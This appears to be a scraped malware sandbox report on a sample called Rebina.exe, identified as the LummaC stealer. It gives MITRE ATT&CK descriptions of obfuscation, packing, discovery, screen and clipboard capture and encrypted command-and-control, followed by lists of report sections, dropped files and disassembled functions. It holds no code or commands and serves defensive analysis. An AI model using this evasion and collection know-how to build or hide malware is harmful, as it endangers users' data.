Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Rebina.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_cdf1f590d4d1aeb836bb3e9d80b6b2ec3c893ae1_80aeb773_14a7aa62-d666-4161-b5bb-c20704d60ba3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71BA.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72A5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72D5.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Rebina.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Rebina.exe

Function 02AC249D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 00E10988 Relevance: 2.8, Strings: 2, Instructions: 306
COMMON

Function 00E10987 Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Function 00E1051C Relevance: 1.6, APIs: 1, Instructions: 69
threadinjectionCOMMON

Function 00E1142F Relevance: 1.6, APIs: 1, Instructions: 66
threadinjectionCOMMON

Function 00E104F8 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 00E11077 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Function 00E10C1B Relevance: .1, Instructions: 142
COMMON

Function 0040A800 Relevance: 21.6, APIs: 1, Strings: 11, Instructions: 564
libraryCOMMON

Function 0040BD10 Relevance: 10.7, Strings: 8, Instructions: 654
COMMON

Function 00435076 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
libraryCOMMON

Function 004358F0 Relevance: 2.8, Strings: 2, Instructions: 277
COMMON

Function 00435C11 Relevance: 2.6, Strings: 2, Instructions: 77
COMMON